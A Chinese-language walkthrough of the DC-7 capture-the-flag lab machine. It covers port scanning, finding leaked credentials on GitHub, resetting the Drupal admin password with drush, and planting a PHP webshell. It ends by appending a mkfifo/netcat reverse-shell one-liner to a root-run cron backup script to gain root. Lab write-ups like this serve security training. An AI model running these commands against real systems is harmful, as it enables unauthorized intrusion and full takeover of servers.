准备
kail IP: 192.168.178.162
dc-7 IP :未知
信息收集
nmap -sV 192.168.178.162/24
发现靶机IP为192.168.178.162,惯例看看还有没有其他开放的端口
访问80端口,发现是drupalCMS
查看页面给出的提示
欢迎来到DC-7
DC-7引入了一些“新”概念,但是我会让您知道它们是什么。😃
尽管这一挑战并不是技术性的全部,但是如果你需要诉诸于暴力破解或字典攻击,那么您可能不会成功。
您将要做的就是在盒子外面思考。
方式在盒子外面。😃
找了找,在页面下面发现个DC7USER ,在百度搜索@DC7USER后,发现是一个Twitter用户,进入Twitter后搜索这个用户,进入这个用户首页
https://github.com/Dc7User/
点击GitHub的链接发现一个staffdb的源码文件夹,并给了提示这源码是dc7靶机的突破口
直接在github上找有没有上面关键信息,分析源码,发现一个config.php文件,在这个配置文件里找到了用户名dc7user和密码MdR3xOgB7#dW
获取后台账户密码
试了试80端口的登录,发现没有用,那就是ssh登录啦
发现一个backups文件夹和一个mbox文件,都看看
打开mbox文件发现是一个计划任务,定时备份,并发现备份执行的源码在/opt/scripts目录下
进入到/opt/scripts目录下,查看backups.sh脚本文件,发现两个命令gpg和drush(gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码)
进入到/var/www/html目录下,因为网站会有一个admin用户,所以使用drush命令修改admin用户的密码为123456,发现可以修改成功
drush user-password admin --password=“123456”
反弹shell
登录80端口,刚开始也是向直接在content直接上一句话木马的,但是发现不行,查了查发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入
这里试了好多次用链接上传都不行,干脆我直接下载压缩包直接上传了
下载地址:
https://www.drupal.org/project/php
激活这个模块,并且滑到底部点击Install
安装成功
然后对首页面进行编辑
直接用蚁剑连接,连接成功后还是习惯性在蚁剑终端反弹shell给kail
权限提升
当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.178.162 9999 >/tmp/f" >> backups.sh
kail中开监听,反弹shell之后拿到root权限
参考:
https://blog.csdn.net/weixin_43583637/article/details/102809227